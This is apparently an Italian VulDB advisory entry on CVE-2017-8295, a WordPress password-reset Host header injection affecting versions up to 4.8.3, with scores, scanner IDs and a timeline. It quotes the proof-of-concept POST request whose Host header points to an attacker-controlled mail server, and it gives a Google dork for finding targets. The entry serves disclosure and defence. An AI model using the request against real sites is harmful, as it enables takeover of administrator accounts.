WordPress fino 4.8.3 Password Reset wp-login.php mail HOST escalazione di privilegi

CVSS Punteggio Meta TempExploit Prezzo Attuale (≈)Punteggio di interesse CTI
5.8$0-$5k0.13

In WordPress (Content Management System) stata rilevata una vulnerabilità di livello critico. Riguarda la funzione mail del file wp-login.php del componente Password Reset. Attraverso la manipolazione del parametro HOST come parte di HTTP Header conseguenza di una vulerabilità di classe escalazione di privilegi. Questo ha un effetto su riservatezza, integrità e disponibilità.

Data di scoperta del problema 03/05/2017. La vulnerabilità è stata pubblicata in data 04/05/2017 da Dawid Golunski con identificazione EDB-ID 41963 con un exploit (Exploit-DB) (confermato). L'advisory è scaricabile da exploit-db.com. CVE-2017-8295 è identificato come punto debole. La vulnerabilità è relativamente apprezzata, anche se ha un'alta complessità. L'attacco può essere lanciato da remoto. Nessuna autentificazione è richiesta per l'uso. I dettagli tecnici e un pubblico metodo di utilizzo sono conosciuti.

Un metodo di utilizzo è stato sviluppato da Dawid Golunski in HTTP POST Request ed è stata pubblicata prima e non solo dopo il comunicato. L'exploit è scaricabile da exploit-db.com. È stato dichiarato come proof-of-concept. Questa vulnerabilità è stata classificata come un 0-day exploit almeno per 1 giorni. Cercando inurl:wp-login.php è possibile trovare obiettivi vulnerabili con Google Hacking. Un plugin è disponibile per lo scanner Nessus, numero ID 100028 (WordPress 2.3.0 - 4.8.3 Unauthorized Password Reset), che può aiutare a determinare l'esistenza della criticità nel sistema analizzato. Il codice utilizzato dal exploit è:

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
 
user_login=admin&redirect_to=&wp-submit=Get+New+Password

Informazioni riguardo una possibile contromisura non sono al momento disponibili. Si suggerisce di sostituire il prodotto con uno equivalente.

La vulnerabilità è documentata anche nel database Tenable (100028) e Exploit-DB (41963).

Prodottoinfo

Genere

Nome

Versione

Licenza

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv3info

VulDB Punteggio meta-base: 6.1
VulDB Punteggio Meta Temp: 6.0

VulDB Punteggio di base: 6.3
VulDB Punteggio temporaneo: 6.0
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 5.9
NVD Vettore: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VettoreComplessitàAutenticazioneRiservatezzaIntegritàDisponibilità
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare

VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 🔍

Exploitinginfo

Classe: Escalazione di privilegi
CWE: CWE-640
CAPEC: 🔍
ATT&CK: 🔍

Locale: No
Remoto: Si

Disponibilità: 🔍
Accesso: Pubblico
Stato: Proof-of-Concept
Autore: Dawid Golunski
Linguaggio Di Programmazione: 🔍
Scaricamento: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Previsione dei prezzi: 🔍
Preventivo attuale: 🔍

0-Daysbloccaresbloccaresbloccaresbloccare
Oggisbloccaresbloccaresbloccaresbloccare

Nessus ID: 100028
Nessus Nome: WordPress 2.3.0 - 4.8.3 Unauthorized Password Reset
Nessus File: 🔍
Nessus Rischio: 🔍
Nessus Family: 🔍
Nessus Context: 🔍

OpenVAS ID: 100908
OpenVAS Nome: WordPress Password Reset CVE-2017-8295 Security Bypass Vulnerability (Windows)
OpenVAS File: 🔍
OpenVAS Family: 🔍

Qualys ID: 🔍
Qualys Nome: 🔍

Exploit-DB: 🔍

Intelligence Sulle Minacceinfo

Interesse: 🔍
Attori Attivi: 🔍
Gruppi APT attivi: 🔍

Contromisureinfo

Raccomandazione: nessuna contromisura conosciuta
Stato: 🔍

0 giorni di tempo: 🔍

Sequenza temporaleinfo

27/04/2017 🔍
03/05/2017 +6 giorni 🔍
03/05/2017 +0 giorni 🔍
03/05/2017 +0 giorni 🔍
03/05/2017 +0 giorni 🔍
04/05/2017 +1 giorni 🔍
04/05/2017 +0 giorni 🔍
05/05/2017 +1 giorni 🔍
09/05/2017 +4 giorni 🔍
22/12/2020 +1323 giorni 🔍

Fontiinfo

Prodotto: wordpress.com

Advisory: EDB-ID 41963
Riceratore: Dawid Golunski
Stato: Confermato

CVE: CVE-2017-8295 (🔍)
OVAL: 🔍

SecurityTracker: 1038403
SecurityFocus: 98295 - WordPress Password Reset CVE-2017-8295 Security Bypass Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20161013
Varie: 🔍

Voceinfo

Data di creazione: 05/05/2017 09:02
Aggiornamenti: 22/12/2020 12:38
I cambiamenti: 05/05/2017 09:02 (93), 08/06/2020 06:56 (1), 22/12/2020 12:38 (2)
Completa: 🔍

Discussione

Ancora nessun commento. Le Lingue: it + en.

Effettua il login per commentare.

PrecedenteVisione D'insiemeIl prossimo

Do you want to use VulDB in your project?

Use the official API to access entries easily!